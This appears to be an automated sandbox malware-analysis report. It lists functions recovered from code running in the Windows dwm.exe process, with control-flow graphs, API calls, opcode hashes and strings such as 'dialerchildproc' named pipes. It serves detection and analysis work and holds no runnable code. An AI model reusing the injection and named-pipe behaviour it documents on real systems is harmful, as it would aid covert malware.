                                                        control_flow_graph 407 283e0f26910-283e0f26916 408 283e0f26918-283e0f2691b 407->408 409 283e0f26951-283e0f2695b 407->409 411 283e0f26945-283e0f26984 call 283e0f26fc0 408->411 412 283e0f2691d-283e0f26920 408->412 410 283e0f26a78-283e0f26a8d 409->410 415 283e0f26a9c-283e0f26ab6 call 283e0f26e54 410->415 416 283e0f26a8f 410->416 430 283e0f2698a-283e0f2699f call 283e0f26e54 411->430 431 283e0f26a52 411->431 413 283e0f26938 __scrt_dllmain_crt_thread_attach 412->413 414 283e0f26922-283e0f26925 412->414 422 283e0f2693d-283e0f26944 413->422 418 283e0f26927-283e0f26930 414->418 419 283e0f26931-283e0f26936 call 283e0f26f04 414->419 428 283e0f26ab8-283e0f26aed call 283e0f26f7c call 283e0f26e1c call 283e0f27318 call 283e0f27130 call 283e0f27154 call 283e0f26fac 415->428 429 283e0f26aef-283e0f26b20 call 283e0f27190 415->429 420 283e0f26a91-283e0f26a9b 416->420 419->422 428->420 439 283e0f26b31-283e0f26b37 429->439 440 283e0f26b22-283e0f26b28 429->440 442 283e0f269a5-283e0f269b6 call 283e0f26ec4 430->442 443 283e0f26a6a-283e0f26a77 call 283e0f27190 430->443 434 283e0f26a54-283e0f26a69 431->434 446 283e0f26b39-283e0f26b43 439->446 447 283e0f26b7e-283e0f26b94 call 283e0f2268c 439->447 440->439 445 283e0f26b2a-283e0f26b2c 440->445 457 283e0f26a07-283e0f26a11 call 283e0f27130 442->457 458 283e0f269b8-283e0f269dc call 283e0f272dc call 283e0f26e0c call 283e0f26e38 call 283e0f2ac0c 442->458 443->410 452 283e0f26c1f-283e0f26c2c 445->452 453 283e0f26b45-283e0f26b4d 446->453 454 283e0f26b4f-283e0f26b5d call 283e0f35780 446->454 465 283e0f26b96-283e0f26b98 447->465 466 283e0f26bcc-283e0f26bce 447->466 460 283e0f26b63-283e0f26b78 call 283e0f26910 453->460 454->460 476 283e0f26c15-283e0f26c1d 454->476 457->431 478 283e0f26a13-283e0f26a1f call 283e0f27180 457->478 458->457 510 283e0f269de-283e0f269e5 __scrt_dllmain_after_initialize_c 458->510 460->447 460->476 465->466 473 283e0f26b9a-283e0f26bbc call 283e0f2268c call 283e0f26a78 465->473 474 283e0f26bd5-283e0f26bea call 283e0f26910 466->474 475 283e0f26bd0-283e0f26bd3 466->475 473->466 504 283e0f26bbe-283e0f26bc6 call 283e0f35780 473->504 474->476 489 283e0f26bec-283e0f26bf6 474->489 475->474 475->476 476->452 497 283e0f26a45-283e0f26a50 478->497 498 283e0f26a21-283e0f26a2b call 283e0f27098 478->498 494 283e0f26bf8-283e0f26bff 489->494 495 283e0f26c01-283e0f26c11 call 283e0f35780 489->495 494->476 495->476 497->434 498->497 509 283e0f26a2d-283e0f26a3b 498->509 504->466 509->497 510->457 511 283e0f269e7-283e0f26a04 call 283e0f2abc8 510->511 511->457
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 9a7ccc4cd1133da96cf4ac9f49060de58e06fddbcc3ddfb5dacba703af430f5f
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 9681BD2DA0764386FA50EB65A4793992290FF85F80F54C035AE4597796EF3CCB778700
                                                        Function 00000283E0F5CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 514 283e0f5ce28-283e0f5ce4a GetLastError 515 283e0f5ce69-283e0f5ce74 FlsSetValue 514->515 516 283e0f5ce4c-283e0f5ce57 FlsGetValue 514->516 519 283e0f5ce76-283e0f5ce79 515->519 520 283e0f5ce7b-283e0f5ce80 515->520 517 283e0f5ce59-283e0f5ce61 516->517 518 283e0f5ce63 516->518 521 283e0f5ced5-283e0f5cee0 SetLastError 517->521 518->515 519->521 522 283e0f5ce85 call 283e0f5d6cc 520->522 524 283e0f5cef5-283e0f5cf0b call 283e0f5c748 521->524 525 283e0f5cee2-283e0f5cef4 521->525 523 283e0f5ce8a-283e0f5ce96 522->523 527 283e0f5cea8-283e0f5ceb2 FlsSetValue 523->527 528 283e0f5ce98-283e0f5ce9f FlsSetValue 523->528 538 283e0f5cf28-283e0f5cf33 FlsSetValue 524->538 539 283e0f5cf0d-283e0f5cf18 FlsGetValue 524->539 531 283e0f5cec6-283e0f5ced0 call 283e0f5cb94 call 283e0f5d744 527->531 532 283e0f5ceb4-283e0f5cec4 FlsSetValue 527->532 530 283e0f5cea1-283e0f5cea6 call 283e0f5d744 528->530 530->519 531->521 532->530 540 283e0f5cf98-283e0f5cf9f call 283e0f5c748 538->540 541 283e0f5cf35-283e0f5cf3a 538->541 543 283e0f5cf1a-283e0f5cf1e 539->543 544 283e0f5cf22 539->544 545 283e0f5cf3f call 283e0f5d6cc 541->545 543->540 547 283e0f5cf20 543->547 544->538 549 283e0f5cf44-283e0f5cf50 545->549 548 283e0f5cf8f-283e0f5cf97 547->548 551 283e0f5cf62-283e0f5cf6c FlsSetValue 549->551 552 283e0f5cf52-283e0f5cf59 FlsSetValue 549->552 554 283e0f5cf80-283e0f5cf88 call 283e0f5cb94 551->554 555 283e0f5cf6e-283e0f5cf7e FlsSetValue 551->555 553 283e0f5cf5b-283e0f5cf60 call 283e0f5d744 552->553 553->540 554->548 560 283e0f5cf8a call 283e0f5d744 554->560 555->553 560->548
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 00000283E0F5CE37
                                                        • FlsGetValue.KERNEL32(?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CEBC
                                                        • SetLastError.KERNEL32 ref: 00000283E0F5CED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,00000283E0F5ECCC,?,?,?,?,00000283E0F5BF9F,?,?,?,?,?,00000283E0F57AB0), ref: 00000283E0F5CF2C
                                                          • Part of subcall function 00000283E0F5D6CC: HeapAlloc.KERNEL32 ref: 00000283E0F5D721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CF54
                                                          • Part of subcall function 00000283E0F5D744: HeapFree.KERNEL32 ref: 00000283E0F5D75A
                                                          • Part of subcall function 00000283E0F5D744: GetLastError.KERNEL32 ref: 00000283E0F5D764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000283E0F60A6B,?,?,?,00000283E0F6045C,?,?,?,00000283E0F5C84F), ref: 00000283E0F5CF76
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 1b47c9e040abab68aa1d397b5cd4bb9b00ee88e7548c2a4a3269aeabd1c7f97e
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: CB41522C2036444AFE68E7B5557E36912827F45FB0F18C734AD37466E6EE388E678341
                                                        Function 00000283E0F52244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: f43e96a90b51b68ac820b5b4abb326bf94aba3e574739f3afe73f9b56cd1341b
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 32216D7A61564592EB10CB25F46835D73A0FB99BA4F508325EE5902AA8CF3CC65ACB40
                                                        Function 00000283E0F29944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 9fc6c4aca0bf53e8ee9ca2f0312d5538c165fe904540e63dc6119d7f68fa6e9f
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: F4E1F73A60AB4086FB60DF75D46839D37A0FB45F98F508525EE8957B95CF38C6A2C700
                                                        Function 00000283E0F5A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: fa33bcb6df7b1f7ba3df27837f311f8addd876b0ec84dfe298328115fa8ce443
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: E1E1BF7A606B408AEF24CFA5D49839D77A0FF45B98F148125EE8957B95CF34CAB2C700
                                                        Function 00000283E0F5F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 75ffc23d5b7f83b5f0d6e74488fd465ccee52c3f21be2ee577a11624937de4d3
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 5041C62A313A0092FF15CB96E82875A2395BF45FA0F49C1359D0E97785EE3CCA6B8340
                                                        Function 00000283E0F5104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 37ed4835efbd7119e0cd2d04a26a71f40f28254fb457e385f341ad7f073071ae
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 4341AE76215B84C6EB60CF61E45839EB7A5F789F88F008129DF8907758DF38D956CB40
                                                        Function 00000283E0F5D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,00000283E0F5C7DE,?,?,?,?,?,?,?,?,00000283E0F5CF9D,?,?,00000001), ref: 00000283E0F5D087
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F5C7DE,?,?,?,?,?,?,?,?,00000283E0F5CF9D,?,?,00000001), ref: 00000283E0F5D0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F5C7DE,?,?,?,?,?,?,?,?,00000283E0F5CF9D,?,?,00000001), ref: 00000283E0F5D0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F5C7DE,?,?,?,?,?,?,?,?,00000283E0F5CF9D,?,?,00000001), ref: 00000283E0F5D0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,00000283E0F5C7DE,?,?,?,?,?,?,?,?,00000283E0F5CF9D,?,?,00000001), ref: 00000283E0F5D0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: e818e627de6c27ee5714dbca7341a896abf6c9e77f7e00c65e6f48a546612a6e
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 23114F2860764442FE78E7A5657936961467F44FF0F18C3349C69466EADE38CE638301
                                                        Function 00000283E0F57510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: d81f0619044b56284d1e565a3abb554c1abcafa6cb00437318b84599a0bbdce8
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: F9818D68A1274286FE50DBAAB4793996690BF85F80F18C435AD0447796EF38CF678700
                                                        Function 00000283E0F59DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: a7d9d7b048e5fc08dfe15d9f3e8e9bd7ac0f8df1d7bf7177ed7da75793c96ad3
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 56313B29317740E2EF15DB82A4297592394FF48FA0F598535DD1E07391EF38CA678360
                                                        Function 00000283E0F63DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: e54faf3b7a7c381b665d555ac4a37f407343fdcc3afd42043ba230008cf9f501
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 80116025315B4586E750CB56F86831977A0FB99FE4F048234EE5A87794CF38C62687C4
                                                        Function 00000283E0F52F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 5a06322831014412b03cd0534735b6f56bb6a73e39eddf3c93e318428c7a3a49
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: E831B02A702B5583EE54CF96E96872A67A0FF55F84F08C1309E4847B56EF34DAB2C340
                                                        Function 00000283E0F5CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 6eba16786a20b4b30adfad22a0a2ef64a4ee6a9c867ae750edcdca13ca3eaace
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: 7F115C2820364042FE64E7A5A57D32922827F84FB0F14C734AC76467EADE788E678340
                                                        Function 00000283E0F5199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: c95ca9d34189541d2e2f84ed334ba57635d65d6ca371878c5a8ad0a76f3adbbe
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 89018C79302A4582FB10DB52B86C35963A5FB88FC4F888035DE4943755DF3CCA9AC780
                                                        Function 00000283E0F536C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 4cb6b43ec0c639e6508b734228c0664933bf0ff8739f67a98235ed53cdcc240f
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: 0B0117A9616B4582EF24DB65F82C71963A0BF59F86F088434CD4907765EF3DC62A8740
                                                        Function 00000283E0F58FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction ID: 3de8716ebc1d30f13175d77061af6a6c1abd36e584203b8c50110d6653975133
                                                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction Fuzzy Hash: B051CF3A20AA1286EF18CB65E85CB5937A6FB44F88F15C534DE0647789DF34DE62C740
                                                        Function 00000283E0F51A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: 123bb44d9ad18b1a5fe3a59d260b4735cf093de9a10cbe5042f024bfb4d0d968
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: BCF0AF6630564592EB20CB61F9A835D6761FB48F88F84C130CE4946A58DF3CCB9FCB40
                                                        Function 00000283E0F5BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: a1ad8a7db258d3eab49b2c5981427ae915d2b34c3ed62adc05288421570d67d2
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 7CF06269212B0991EF10CB64F46C35D6320FF84F61F548339CE6A462E4DF3DC6668380
                                                        Function 00000283E0F53044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: ad86c64bf247c084d15fc4090471417bc291f7a74559b1cb45be965bb7001921
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 82F08268706B8982EA00CB57B92C11DA360BF48FC4F04C130EE4A07B58DF3CC6678740
                                                        Function 00000283E0F55710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                        • Instruction ID: 1d4b70c369215b6a13c8b9b9db238be568f70759e1171b9a21ead97ca1bd6ecf
                                                        • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
